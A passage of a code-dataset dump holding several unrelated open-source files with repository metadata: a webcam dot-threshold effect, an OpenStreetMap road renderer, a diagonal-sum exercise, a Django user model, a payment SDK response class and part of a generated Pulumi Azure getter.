"umesh@gattems-MacBook-Pro.local"
] | umesh@gattems-MacBook-Pro.local |
428376d583c567432c1ef5196b05262cfe856565 | d7b3feb650e3dd5f5e59c5e9ed796ef10767b32f | /dot_threshold_video_manupulation.py | 5227601562cb5fb4c1ebc3da8fec0ae05bc2e317 | [] | no_license | Mainak-Deb/opencv-video-manupulation-using-pygame | 6a83eed06623e006d3a531992bd111efe032e8a0 | 3c2f8727e11a6ed020e936b349a41325b9f4523b | refs/heads/master | 2023-02-21T03:42:21.747902 | 2021-01-19T21:34:11 | 2021-01-19T21:34:11 | 331,114,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,321 | py | import time,math,random
import pygame,sys
from pygame.locals import *
import math
import cv2
cap=cv2.VideoCapture(0)
ret,img1=cap.read()
k=((len(img1)*len(img1[1]))/5000)**(.5)
rx=len(img1)/k
ry=len(img1[1])/k
r=int(len(img1)/rx)
c=int(len(img1[1])/ry)
screenlenth=800
dis=screenlenth/100
screen=pygame.display.set_mode((int(dis*ry),int(dis*rx)))
pygame.display.set_caption("Video MANUPULATION 2")
pygame.init()
threshold=10
running=True
while running:
ret,img1=cap.read()
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
img1 = cv2.flip(img1, 1)
screen.fill((0,0,0))
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
cap.release()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
for i in range(int(c/2),len(img1),c):
for j in range(int(r/2),len(img1[i]),r):
cl=int((img1[i][j])/(255/threshold))*int(255/threshold)
pygame.draw.circle(screen,(cl,cl,cl),(int(dis*((j-int(c/2))/c)),int(dis*((i-int(r/2))/r))),int(dis/2))
pygame.display.update()
cap.release()
cv2.destroyAllWindows()
| [
"debmainak37@gmail.com"
] | debmainak37@gmail.com |
9c1e7ccfd0b2f7d17f8fe90ca5e9987b5d32120c | b9a68a2135a92419203f78fbf98f67340ed04095 | /rviz_map_publisher/scripts_without_ros/osm_render.py | 807eee0aae984ce23f55c219c299f7dc7666259f | [] | no_license | szenergy/szenergy-utility-programs | 487002758f2edfe877b88fa0853931f862a3a8e1 | 2a3d5e0213a4d68afe1ea22f5f38d399791e7ec8 | refs/heads/master | 2023-05-27T16:14:17.140427 | 2023-05-18T14:58:31 | 2023-05-18T14:58:31 | 207,478,962 | 2 | 3 | null | 2022-06-03T10:34:47 | 2019-09-10T06:12:33 | Jupyter Notebook | UTF-8 | Python | false | false | 27,086 | py |
#!/usr/bin/env python
#############################################################
## from http://code.activestate.com/recipes/534109-xml-to-python-data-structure/
import re
import xml.sax.handler
def xml2obj(src):
    """
    Convert XML data into a native Python object tree.

    *src* may be a string containing an XML document or a file-like
    object.  Element attributes and child elements become attributes of
    DataNode objects, text-only elements collapse to plain strings, and
    repeated child names collapse to lists.  Returns the document's root
    element.

    Python 3 fixes applied: ``__contains__`` no longer uses the removed
    ``dict.has_key``; the truth-value hook is ``__bool__`` (with
    ``__nonzero__`` kept as an alias for Python 2); ``xml.sax.parseString``
    is fed bytes, as Python 3 requires.
    """
    non_id_char = re.compile('[^_0-9a-zA-Z]')
    def _name_mangle(name):
        # XML names may contain characters that are illegal in Python
        # identifiers; replace them so attribute access works.
        return non_id_char.sub('_', name)

    class DataNode(object):
        def __init__(self):
            self._attrs = {}    # XML attributes and child elements
            self.data = None    # child text data
        def __len__(self):
            # treat single element as a list of 1
            return 1
        def __getitem__(self, key):
            if isinstance(key, str):
                return self._attrs.get(key, None)
            else:
                # integer index: treat this single node as a one-element list
                return [self][key]
        def __contains__(self, name):
            # BUG FIX: dict.has_key() was removed in Python 3; use `in`.
            return name in self._attrs
        def __bool__(self):
            return bool(self._attrs or self.data)
        # Python 2 spelling of the truth-value hook, kept for compatibility.
        __nonzero__ = __bool__
        def __getattr__(self, name):
            if name.startswith('__'):
                # need to do this for Python special methods???
                raise AttributeError(name)
            return self._attrs.get(name, None)
        def _add_xml_attr(self, name, value):
            if name in self._attrs:
                # multiple attributes of the same name are represented by a list
                children = self._attrs[name]
                if not isinstance(children, list):
                    children = [children]
                    self._attrs[name] = children
                children.append(value)
            else:
                self._attrs[name] = value
        def __str__(self):
            return self.data or ''
        def __repr__(self):
            items = sorted(self._attrs.items())
            if self.data:
                items.append(('data', self.data))
            return u'{%s}' % ', '.join([u'%s:%s' % (k, repr(v)) for k, v in items])

    class TreeBuilder(xml.sax.handler.ContentHandler):
        def __init__(self):
            self.stack = []
            self.root = DataNode()
            self.current = self.root
            self.text_parts = []
        def startElement(self, name, attrs):
            self.stack.append((self.current, self.text_parts))
            self.current = DataNode()
            self.text_parts = []
            # xml attributes --> python attributes
            for k, v in attrs.items():
                self.current._add_xml_attr(_name_mangle(k), v)
        def endElement(self, name):
            text = ''.join(self.text_parts).strip()
            if text:
                self.current.data = text
            if self.current._attrs:
                obj = self.current
            else:
                # a text only node is simply represented by the string
                obj = text or ''
            self.current, self.text_parts = self.stack.pop()
            self.current._add_xml_attr(_name_mangle(name), obj)
        def characters(self, content):
            self.text_parts.append(content)

    builder = TreeBuilder()
    if isinstance(src, str):
        # BUG FIX: Python 3's xml.sax.parseString() requires a bytes
        # buffer, so encode str input before handing it over.
        xml.sax.parseString(src.encode('utf-8'), builder)
    else:
        xml.sax.parse(src, builder)
    # The document root is the single child element of the synthetic root.
    return next(iter(builder.root._attrs.values()))
#############################################################
def main():
  """Render the road network of the global ``myMap`` OSM document with pylab.

  Builds id->element lookup dicts for nodes and ways, extracts each way's
  ``highway`` tag value into wayType, then draws every drawable way using
  the per-type style in ``renderingRules``.  Blocks on the matplotlib
  window (p.show()) at the end.
  """
  # make dictionary of node IDs
  nodes = {}
  for node in myMap['node']:
    nodes[node['id']] = node
  ways = {}
  for way in myMap['way']:
    ways[way['id']]=way
  print(len(nodes))
  print(len(ways))
  # draw the map
  import pylab as p
  ##p.ion()
  ##
  ##p.figure()
  ##for way in myMap['way']:
  ##  lastPoint=None
  ##  for nd in way['nd']:
  ##    newPointLat = nodes[nd['ref']]['lat']
  ##    newPointLong= nodes[nd['ref']]['lon']
  ##    newPoint = (float(newPointLat),float(newPointLong))
  ##    if not lastPoint==None:
  ##      lastX = lastPoint[0]
  ##      lastY = lastPoint[1]
  ##      newX = newPoint[0]
  ##      newY = newPoint[1]
  ##      p.plot([lastX,newX],[lastY,newY],'-b')
  ##    lastPoint = newPoint
  ##
  ##p.ioff()
  ##p.show()
  ###p.ion()
  ##
  ##p.figure()
  ##for idx,nodeID in enumerate(nodes.keys()):
  ##  y = float(nodes[nodeID]['lat'])
  ##  x = float(nodes[nodeID]['lon'])
  ##  p.plot([x],[y],'.b')
  ##  if idx%1000 == 0:
  ##    print(idx)
  ##
  ##p.ioff()
  ##p.show()
  # try to find a list of all intersections
  # build matrix of first and last node ids for each way
  print('Enumerating end nodes.')
  endNodes = {}
  wayType = {}
  for wayID in ways.keys():
    # endNodes maps way id -> [first nd, last nd]; wayType maps way id ->
    # its 'highway' tag value (only for ways that have one).
    endNodes[wayID] = [ ways[wayID]['nd'][0], ways[wayID]['nd'][-1]]
    wayTags = ways[wayID]['tag']
    if not wayTags==None:
      hwyTypeList = [d['v'] for d in wayTags if d['k']=='highway']
      if len(hwyTypeList)>0:
        wayType[wayID] = hwyTypeList[0]
  print('Done enumerating end nodes')
  print(wayType)
  print(set([wayType[k] for k in wayType.keys()]))
  roadTypes = set([wayType[k] for k in wayType.keys()])  # NOTE(review): unused below
  #p.ion()
  # Per-highway-type matplotlib style kwargs.  Keys with a leading
  # underscore are consumed by the plotting loop below for the first/last
  # endpoint markers of a way; the rest style the segments and vertices.
  renderingRules = {
    'primary': dict(
        marker = 'D',
        markeredgecolor = 'b',
        markeredgewidth = 1,
        markerfacecolor = 'b',
        markersize = 2,
        linestyle = '-',
        linewidth = 10,
        color = (0.7,0.7,1.0,0.1),
        alpha = 1.0,
        solid_capstyle = 'round',
        solid_joinstyle = 'round',
        zorder = -1,
        markerzorder = 0,
        _firstmarker = 'x',
        _firstmarkeredgecolor = 'g',
        _firstmarkeredgewidth = 1,
        _firstmarkerfacecolor = 'g',
        _firstmarkersize = 8,
        _firstzorder = 1,
        _lastmarker = 'o',
        _lastmarkeredgecolor = 'r',
        _lastmarkeredgewidth = 1,
        _lastmarkerfacecolor = 'r',
        _lastmarkersize = 8,
        _lastzorder = 0,
        ),
    'primary_link': dict(
        marker = 'D',
        markeredgecolor = 'b',
        markeredgewidth = 1,
        markerfacecolor = 'b',
        markersize = 2,
        linestyle = '-',
        linewidth = 8,
        color = (0.7,0.7,1.0,0.1),
        alpha = 1.0,
        solid_capstyle = 'round',
        solid_joinstyle = 'round',
        zorder = -1,
        markerzorder = 0,
        _firstmarker = 'x',
        _firstmarkeredgecolor = 'g',
        _firstmarkeredgewidth = 1,
        _firstmarkerfacecolor = 'g',
        _firstmarkersize = 12,
        _firstzorder = 1,
        _lastmarker = 'o',
        _lastmarkeredgecolor = 'r',
        _lastmarkeredgewidth = 1,
        _lastmarkerfacecolor = 'r',
        _lastmarkersize = 8,
        _lastzorder = 0,
        ),
    'secondary': dict(
        marker = 'D',
        markeredgecolor = 'b',
        markeredgewidth = 1,
        markerfacecolor = 'b',
        markersize = 2,
        linestyle = '-',
        linewidth = 6,
        color = (0.2,0.2,0.7,0.1),
        alpha = 0.5,
        solid_capstyle = 'round',
        solid_joinstyle = 'round',
        zorder = -2,
        markerzorder = 0,
        _firstmarker = 'x',
        _firstmarkeredgecolor = 'g',
        _firstmarkeredgewidth = 1,
        _firstmarkerfacecolor = 'g',
        _firstmarkersize = 10,
        _firstzorder = 1,
        _lastmarker = 'o',
        _lastmarkeredgecolor = 'r',
        _lastmarkeredgewidth = 1,
        _lastmarkerfacecolor = 'r',
        _lastmarkersize = 8,
        _lastzorder = 0,
        ),
    'secondary_link': dict(
        marker = 'D',
        markeredgecolor = 'b',
        markeredgewidth = 1,
        markerfacecolor = 'b',
        markersize = 2,
        linestyle = '-',
        linewidth = 6,
        color = (0.2,0.2,0.7,0.1),
        alpha = 0.5,
        solid_capstyle = 'round',
        solid_joinstyle = 'round',
        zorder = -2,
        markerzorder = 0,
        _firstmarker = 'x',
        _firstmarkeredgecolor = 'g',
        _firstmarkeredgewidth = 1,
        _firstmarkerfacecolor = 'g',
        _firstmarkersize = 10,
        _firstzorder = 1,
        _lastmarker = 'o',
        _lastmarkeredgecolor = 'r',
        _lastmarkeredgewidth = 1,
        _lastmarkerfacecolor = 'r',
        _lastmarkersize = 8,
        _lastzorder = 0,
        ),
    'tertiary': dict(
        marker = 'D',
        markeredgecolor = 'b',
        markeredgewidth = 1,
        markerfacecolor = 'b',
        markersize = 2,
        linestyle = '-',
        linewidth = 4,
        color = (0.0,0.0,0.7,0.1),
        alpha = 0.5,
        solid_capstyle = 'round',
        solid_joinstyle = 'round',
        zorder = -3,
        markerzorder = 0,
        _firstmarker = 'x',
        _firstmarkeredgecolor = 'g',
        _firstmarkeredgewidth = 1,
        _firstmarkerfacecolor = 'g',
        _firstmarkersize = 10,
        _firstzorder = 1,
        _lastmarker = 'o',
        _lastmarkeredgecolor = 'r',
        _lastmarkeredgewidth = 1,
        _lastmarkerfacecolor = 'r',
        _lastmarkersize = 8,
        _lastzorder = 0,
        ),
    'tertiary_link': dict(
        marker = 'D',
        markeredgecolor = 'b',
        markeredgewidth = 1,
        markerfacecolor = 'b',
        markersize = 2,
        linestyle = '-',
        linewidth = 4,
        color = (0.0,0.0,0.7,0.1),
        alpha = 0.5,
        solid_capstyle = 'round',
        solid_joinstyle = 'round',
        zorder = -3,
        markerzorder = 0,
        _firstmarker = 'x',
        _firstmarkeredgecolor = 'g',
        _firstmarkeredgewidth = 1,
        _firstmarkerfacecolor = 'g',
        _firstmarkersize = 10,
        _firstzorder = 1,
        _lastmarker = 'o',
        _lastmarkeredgecolor = 'r',
        _lastmarkeredgewidth = 1,
        _lastmarkerfacecolor = 'r',
        _lastmarkersize = 8,
        _lastzorder = 0,
        ),
    'residential': dict(
        marker = 'D',
        markeredgecolor = 'b',
        markeredgewidth = 1,
        markerfacecolor = 'b',
        markersize = 2,
        linestyle = '-',
        linewidth = 1,
        color = (0.1,0.1,0.1,1.0),
        alpha = 1.0,
        solid_capstyle = 'round',
        solid_joinstyle = 'round',
        zorder = -99,
        markerzorder = 0,
        _firstmarker = 'x',
        _firstmarkeredgecolor = 'g',
        _firstmarkeredgewidth = 1,
        _firstmarkerfacecolor = 'g',
        _firstmarkersize = 10,
        _firstzorder = 1,
        _lastmarker = 'o',
        _lastmarkeredgecolor = 'r',
        _lastmarkeredgewidth = 1,
        _lastmarkerfacecolor = 'r',
        _lastmarkersize = 8,
        _lastzorder = 0,
        ),
    'unclassified': dict(
        marker = 'D',
        markeredgecolor = (0.5,0.5,0.5),
        markeredgewidth = 1,
        markerfacecolor = (0.5,0.5,0.5),
        markersize = 2,
        linestyle = ':',
        linewidth = 1,
        color = (0.5,0.5,0.5),
        alpha = 0.5,
        solid_capstyle = 'round',
        solid_joinstyle = 'round',
        zorder = -1,
        markerzorder = 0,
        _firstmarker = 'x',
        _firstmarkeredgecolor = 'g',
        _firstmarkeredgewidth = 1,
        _firstmarkerfacecolor = 'g',
        _firstmarkersize = 6,
        _firstzorder = 1,
        _lastmarker = 'o',
        _lastmarkeredgecolor = 'r',
        _lastmarkeredgewidth = 1,
        _lastmarkerfacecolor = 'r',
        _lastmarkersize = 6,
        _lastzorder = 0,
        ),
    'default': dict(
        marker = 'D',
        markeredgecolor = 'b',
        markeredgewidth = 1,
        markerfacecolor = 'b',
        markersize = 2,
        linestyle = '-',
        linewidth = 3,
        color = 'b',
        alpha = 0.5,
        solid_capstyle = 'round',
        solid_joinstyle = 'round',
        zorder = -1,
        markerzorder = 0,
        _firstmarker = 'x',
        _firstmarkeredgecolor = 'b',
        _firstmarkeredgewidth = 1,
        _firstmarkerfacecolor = 'b',
        _firstmarkersize = 6,
        _firstzorder = 1,
        _lastmarker = 'o',
        _lastmarkeredgecolor = 'b',
        _lastmarkeredgewidth = 1,
        _lastmarkerfacecolor = 'b',
        _lastmarkersize = 6,
        _lastzorder = 0,
        ),
    }
  # NOTE(review): the min/max values computed by this loop are immediately
  # overwritten from myMap's <bounds> element just below, so the whole
  # scan over nodes is dead work.
  for idx,nodeID in enumerate(nodes.keys()):
    if idx==0:
      minX = float(nodes[nodeID]['lon'])
      maxX = float(nodes[nodeID]['lon'])
      minY = float(nodes[nodeID]['lat'])
      maxY = float(nodes[nodeID]['lat'])
    else:
      minX = min(minX,float(nodes[nodeID]['lon']))
      maxX = max(maxX,float(nodes[nodeID]['lon']))
      minY = min(minY,float(nodes[nodeID]['lat']))
      maxY = max(maxY,float(nodes[nodeID]['lat']))
  minX = float(myMap['bounds']['minlon'])
  maxX = float(myMap['bounds']['maxlon'])
  minY = float(myMap['bounds']['minlat'])
  maxY = float(myMap['bounds']['maxlat'])
  fig = p.figure()
  # Fixed axis limits taken from the OSM extract's declared bounds.
  ax = fig.add_subplot(111,autoscale_on=False,xlim=(minX,maxX),ylim=(minY,maxY))
  # Draw every way whose highway type we render; KeyError from missing
  # node references is silently skipped by the enclosing try/except.
  for idx,nodeID in enumerate(wayType.keys()):
##    if idx>100:
##      break
    try:
      if wayType[nodeID] in ['primary','primary_link','unclassified',
                             'secondary','secondary_link',
                             'tertiary','tertiary_link',
                             'residential',
                             ]:
        # NOTE(review): zz is never used, and the missing comma after
        # 'residential' concatenates it with 'unclassified' into the
        # single string 'residentialunclassified'.
        zz=['primary_link','primary',
            'secondary','secondary_link',
            'tertiary','tertiary_link',
            'motorway','motorway_link',
            'service',
            'residential'
            'unclassified',
            ]
        oldX = None
        oldY = None
        thisRoadType = wayType[nodeID]
        if thisRoadType in renderingRules.keys():
          thisRendering = renderingRules[thisRoadType]
        else:
          thisRendering = renderingRules['default']
        for nCnt,nID in enumerate(ways[nodeID]['nd']):
          y = float(nodes[nID['ref']]['lat'])
          x = float(nodes[nID['ref']]['lon'])
          if oldX == None:
            # first point in road way
            p.plot([x],[y],
              marker = thisRendering['_firstmarker'],
              markeredgecolor = thisRendering['_firstmarkeredgecolor'],
              markeredgewidth = thisRendering['_firstmarkeredgewidth'],
              markerfacecolor = thisRendering['_firstmarkerfacecolor'],
              markersize = thisRendering['_firstmarkersize'],
              zorder = thisRendering['_firstzorder'],
              )
          elif nCnt<(len(ways[nodeID]['nd'])-1):
            # interior segment: draw the line plus a small vertex marker
            p.plot([oldX,x],[oldY,y],
              marker = '',
              linestyle = thisRendering['linestyle'],
              linewidth = thisRendering['linewidth'],
              color = thisRendering['color'],
              alpha = thisRendering['alpha'],
              solid_capstyle = thisRendering['solid_capstyle'],
              solid_joinstyle = thisRendering['solid_joinstyle'],
              zorder = thisRendering['zorder'],
              )
            p.plot([x],[y],
              marker = thisRendering['marker'],
              markeredgecolor = thisRendering['markeredgecolor'],
              markeredgewidth = thisRendering['markeredgewidth'],
              markerfacecolor = thisRendering['markerfacecolor'],
              markersize = thisRendering['markersize'],
              color = thisRendering['color'],
              alpha = thisRendering['alpha'],
              zorder = thisRendering['markerzorder'],
              )
          else:
            # last segment in road way
            p.plot([oldX,x],[oldY,y],
              marker = '',
              linestyle = thisRendering['linestyle'],
              linewidth = thisRendering['linewidth'],
              color = thisRendering['color'],
              alpha = thisRendering['alpha'],
              solid_capstyle = thisRendering['solid_capstyle'],
              solid_joinstyle = thisRendering['solid_joinstyle'],
              zorder = thisRendering['zorder'],
              )
          oldX = x
          oldY = y
        # last point in road way
        p.plot([x],[y],
          marker = thisRendering['_lastmarker'],
          markeredgecolor = thisRendering['_lastmarkeredgecolor'],
          markeredgewidth = thisRendering['_lastmarkeredgewidth'],
          markerfacecolor = thisRendering['_lastmarkerfacecolor'],
          markersize = thisRendering['_lastmarkersize'],
          zorder = thisRendering['_lastzorder'],
          )
    except KeyError:
      pass
    if idx%100 == 0:
      print(idx)
  #p.ioff()
  print('Done Plotting')
  p.show()
def nodeDist(nodes,oldNodeID,newNodeID):
y0 = float(nodes[oldNodeID]['lat'])
x0 = float(nodes[oldNodeID]['lon'])
y1 = float(nodes[newNodeID]['lat'])
x1 = float(nodes[newNodeID]['lon'])
return ((x0-x1)**2+(y0-y1)**2)**(0.5)
from scipy import sparse
def linkNodes():
# make dictionary of node IDs
nodes = {}
for node in myMap['node']:
nodes[node['id']] = node
ways = {}
for way in myMap['way']:
ways[way['id']]=way
neighborDict = {}
print(len(nodes))
print(len(ways))
M = sparse.lil_matrix((len(nodes),len(nodes)))
nodeID_List = sorted(nodes.keys())
# walk each way and enter distance for nodes in way node list
for wayID in ways.keys():
way = ways[wayID]
wayTags = way['tag']
if not wayTags==None:
hwyTypeList = [d['v'] for d in wayTags if d['k']=='highway']
if len(hwyTypeList)>0:
wayType = hwyTypeList[0]
else:
wayType = None
if wayType in ['primary_link','primary',
'secondary','secondary_link',
'tertiary','tertiary_link',
'motorway','motorway_link',
'service',
'residential',
'unclassified',
'multipolygon'
]:
# this way is a highway of some sort
for idx,node in enumerate(way['nd']):
if idx==0:
oldNodeID = node['ref']
oldNodeIdx = nodeID_List.index(oldNodeID)
else:
newNodeID = node['ref']
distance = nodeDist(nodes,oldNodeID,newNodeID)
newNodeIdx = nodeID_List.index(newNodeID)
M[oldNodeIdx,newNodeIdx]=distance
M[newNodeIdx,oldNodeIdx]=distance
try:
neighborDict[oldNodeID].append(newNodeID)
except KeyError:
neighborDict[oldNodeID] = [newNodeID]
try:
neighborDict[newNodeID].append(oldNodeID)
except KeyError:
neighborDict[newNodeID] = [oldNodeID]
oldNodeID = newNodeID
oldNodeIdx = newNodeIdx
return (M,nodeID_List, neighborDict)
##
## print('Linking end nodes')
##
## wayLinks = {}
## for firstWayID in wayType.keys():
## firstNodeSet = set([id['ref'] for id in ways[firstWayID]['nd']])
## for secondWayID in wayType.keys():
## secondNodeSet = set([id['ref'] for id in ways[secondWayID]['nd']])
## if any(firstNodeSet.intersection(secondNodeSet)):
## if firstWayID <> secondWayID:
## try:
## wayLinks[firstWayID].append(secondWayID)
## except KeyError:
## wayLinks[firstWayID]=[secondWayID]
##
## ## if ((endNodes[firstWayID][0] in ways[secondWayID]['nd']) or
## ## (endNodes[firstWayID][1] in ways[secondWayID]['nd'])):
## ## if firstWayID <> secondWayID:
## ## try:
## ## wayLinks[firstWayID].append(secondWayID)
## ## except KeyError:
## ## wayLinks[firstWayID]=[secondWayID]
##
##
## print(len(wayLinks.keys()))
##
##import cProfile
##cProfile.run('main()','multiWeightingRouting_002.prof')
#src = file("map_campus_gyor01.osm") # basestring python 2 version
src = open("map_campus_gyor01.osm")
myMap = xml2obj(src)
main()
(M,nodeID_List,neighborDict)=linkNodes()
##from matplotlib.pyplot import figure, show
##import numpy
##
##fig = figure()
##ax1 = fig.add_subplot(111)
##
##ax1.spy(M, precision=0.00001)
##
##show()
""""
from AStarSearch import *
def neighbor_nodes(x):
rowIdx = nodeID_List.index(x)
row = M[rowIdx,:]
rowValues = []
for i in range(0,row.get_shape()[1]):
rowValues.append(row[0,i])
nodeList = [nodeID_List[colIdx] for colIdx,val in enumerate(rowValues) if val>0]
return nodeList
##def build_neighbor_Dict():
## neighborDict = {}
## for rowIdx,nodeID in enumerate(nodeID_List):
## row = M[rowIdx,:]
## rowValues = []
## for i in range(0,row.get_shape()[1]):
## rowValues.append(row[0,i])
## nodeList = [nodeID_List[colIdx] for colIdx,val in enumerate(rowValues) if val>0]
## neighborDict[nodeID]=nodeList
##
## if rowIdx%100 == 0: print '... finished row #%i' % rowIdx
## return neighborDict
def neighbor_node_lookup(x):
return neighborDict[x]
def distance_between(x,y):
rowIdx = nodeID_List.index(x)
colIdx = nodeID_List.index(y)
return M[rowIdx,colIdx]
##print 'Building Neighbor Node Dictionary'
##neighborDict = build_neighbor_Dict()
print 'Routing...'
print Astar("61916608","820007070",distance_between,neighbor_node_lookup,distance_between)
print 'Done'
""" | [
"horverno@gmail.com"
] | horverno@gmail.com |
81ceb438b92b56de14e3d9cdc5c79b3fdbaa1ff1 | d2ed0c6b479e826039d6ce848e911100341c3373 | /Sum_of_diagonals.py | 348bd395141a45a6a23fa02b31268af57e48f4da | [] | no_license | Ajith-Kumar-V/Guvicodekatta | 595b9672136f221b4f06ecb3de2fdfda6dbc6600 | 7d510b689eafb1c31d94104aaef89654d901a351 | refs/heads/master | 2023-05-11T22:15:35.797834 | 2023-05-02T06:34:54 | 2023-05-02T06:34:54 | 223,870,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 306 | py | n=int(input())
l=[]
# Read an n x n integer matrix from stdin, one whitespace-separated row per
# line; rows are truncated to n values. (n is read earlier in the script.)
for i in range(n):
    h=[int(x) for x in input().split()][:n]
    l.append(h)
k=0
o=0
# k accumulates the main-diagonal sum (i == j);
# o accumulates the anti-diagonal sum (i + j == n - 1).
for i in range(n):
    for j in range(n):
        if (i==j):
            k=k+l[i][j]
        if ((i+j)==(n-1)):
            o=o+l[i][j]
# Output the product of the two diagonal sums.
print(k*o)
| [
"noreply@github.com"
] | Ajith-Kumar-V.noreply@github.com |
f19f741ea3c34845081181763d347520a1caa887 | 619f292b7da344fcf16418f1f3ed31eb76ecfbc7 | /accounts/models.py | cab65acd7c0b679e83b2150af80ec43fed73b319 | [] | no_license | AhmadShalein/drf-auth | 1c1d692e122d0b28673641355f8be51fc3265f3c | 055d4cba1a155a4a9c13993739f0b373cd712d1a | refs/heads/master | 2023-08-05T08:11:25.438323 | 2021-09-10T21:35:31 | 2021-09-10T21:35:31 | 404,116,860 | 0 | 0 | null | 2021-09-10T21:35:32 | 2021-09-07T20:40:59 | Python | UTF-8 | Python | false | false | 183 | py | from django.contrib.auth.models import AbstractUser
class CustomUser(AbstractUser):
    """Project user model extending Django's ``AbstractUser``.

    No extra fields yet; swapping in a custom user model up front avoids a
    painful migration if fields are added later.
    """
    # add additional fields in here
    # (removed the redundant `pass` — the class already has a real body)

    def __str__(self):
        """Human-readable representation used by the admin and templates."""
        return self.username
"ahmadshalein@gmail.com"
] | ahmadshalein@gmail.com |
f4a69f5e7bb25cf7ff64d9bae0aa9e8d7ad77f17 | 409adbf0d2f6a54e0c026c6ae454ce141d90ac82 | /checkout_sdk/payments/payment_action_response.py | d7f80c3c16b4cc8d807b2db39c463041a8ad1044 | [
"MIT"
] | permissive | intelligems/checkout-sdk-python | 13a4934dc2d178d3d108355ae842f35a1ab5594c | 729eb99a76e3a139c59ad045ff6d1fbd1252141d | refs/heads/master | 2020-04-08T05:56:49.092606 | 2018-11-28T08:23:38 | 2018-11-28T08:23:38 | 159,079,942 | 0 | 1 | MIT | 2018-11-27T10:16:23 | 2018-11-25T22:18:40 | Python | UTF-8 | Python | false | false | 621 | py | from checkout_sdk.payments import PaymentResponse
class PaymentActionResponse(PaymentResponse):
    """Response wrapper for a payment action (e.g. capture/refund/void).

    Exposes fields of the underlying API response body as read-only
    properties. ``self._response`` is presumably set by the
    ``PaymentResponse`` base class — confirm against that class.
    """
    @property
    def created(self):
        """Creation timestamp from the API response body."""
        return self._response.body['created']
    @property
    def track_id(self):
        """Merchant-supplied tracking id ('trackId' in the response body)."""
        return self._response.body['trackId']
    @property
    def currency(self):
        """ISO currency code of the action."""
        return self._response.body['currency']
    @property
    def value(self):
        """Monetary value of the action, as returned by the API."""
        return self._response.body['value']
    @property
    def response_code(self):
        """Gateway response code ('responseCode' in the body)."""
        return self._response.body['responseCode']
    @property
    def approved(self):
        """True when the response code starts with '1' (approval convention)."""
        return str(self.response_code).startswith('1')
| [
"noreply@github.com"
] | intelligems.noreply@github.com |
b755ac44206a9c9dda1a389710cdf3a9fba8ec30 | 9cd180fc7594eb018c41f0bf0b54548741fd33ba | /sdk/python/pulumi_azure_nextgen/securityinsights/v20190101preview/get_watchlist.py | c72fb1c220e6a8ad7528ffa0f04b1c3a81368bad | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | MisinformedDNA/pulumi-azure-nextgen | c71971359450d03f13a53645171f621e200fe82d | f0022686b655c2b0744a9f47915aadaa183eed3b | refs/heads/master | 2022-12-17T22:27:37.916546 | 2020-09-28T16:03:59 | 2020-09-28T16:03:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,021 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetWatchlistResult',
'AwaitableGetWatchlistResult',
'get_watchlist',
]
@pulumi.output_type
class GetWatchlistResult:
"""
Represents a Watchlist in Azure Security Insights.
"""
def __init__(__self__, created_by=None, created_time_utc=None, default_duration=None, description=None, display_name=None, etag=None, labels=None, last_updated_time_utc=None, name=None, notes=None, provider=None, source=None, tenant_id=None, type=None, updated_by=None, watchlist_items=None, watchlist_type=None, workspace_id=None):
if created_by and not isinstance(created_by, dict):
raise TypeError("Expected argument 'created_by' to be a dict")
pulumi.set(__self__, "created_by", created_by)
if created_time_utc and not isinstance(created_time_utc, str):
raise TypeError("Expected argument 'created_time_utc' to be a str")
pulumi.set(__self__, "created_time_utc", created_time_utc)
if default_duration and not isinstance(default_duration, str):
raise TypeError("Expected argument 'default_duration' to be a str")
pulumi.set(__self__, "default_duration", default_duration)
if description and not isinstance(description, str):
raise TypeError("Expected argument 'description' to be a str")
pulumi.set(__self__, "description", description)
if display_name and not isinstance(display_name, str):
raise TypeError("Expected argument 'display_name' to be a str")
pulumi.set(__self__, "display_name", display_name)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if labels and not isinstance(labels, list):
raise TypeError("Expected argument 'labels' to be a list")
pulumi.set(__self__, "labels", labels)
if last_updated_time_utc and not isinstance(last_updated_time_utc, str):
raise TypeError("Expected argument 'last_updated_time_utc' to be a str")
pulumi.set(__self__, "last_updated_time_utc", last_updated_time_utc)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if notes and not isinstance(notes, str):
raise TypeError("Expected argument 'notes' to be a str")
pulumi.set(__self__, "notes", notes)
if provider and not isinstance(provider, str):
raise TypeError("Expected argument 'provider' to be a str")
pulumi.set(__self__, "provider", provider)
if source and not isinstance(source, str):
raise TypeError("Expected argument 'source' to be a str")
pulumi.set(__self__, "source", source)
if tenant_id and not isinstance(tenant_id, str):
raise TypeError("Expected argument 'tenant_id' to be a str")
pulumi.set(__self__, "tenant_id", tenant_id)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if updated_by and not isinstance(updated_by, dict):
raise TypeError("Expected argument 'updated_by' to be a dict")
pulumi.set(__self__, "updated_by", updated_by)
if watchlist_items and not isinstance(watchlist_items, list):
raise TypeError("Expected argument 'watchlist_items' to be a list")
pulumi.set(__self__, "watchlist_items", watchlist_items)
if watchlist_type and not isinstance(watchlist_type, str):
raise TypeError("Expected argument 'watchlist_type' to be a str")
pulumi.set(__self__, "watchlist_type", watchlist_type)
if workspace_id and not isinstance(workspace_id, str):
raise TypeError("Expected argument 'workspace_id' to be a str")
pulumi.set(__self__, "workspace_id", workspace_id)
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> Optional['outputs.UserInfoResponse']:
"""
Describes a user that created the watchlist
"""
return pulumi.get(self, "created_by")
@property
@pulumi.getter(name="createdTimeUtc")
def created_time_utc(self) -> Optional[str]:
"""
The time the watchlist was created
"""
return pulumi.get(self, "created_time_utc")
@property
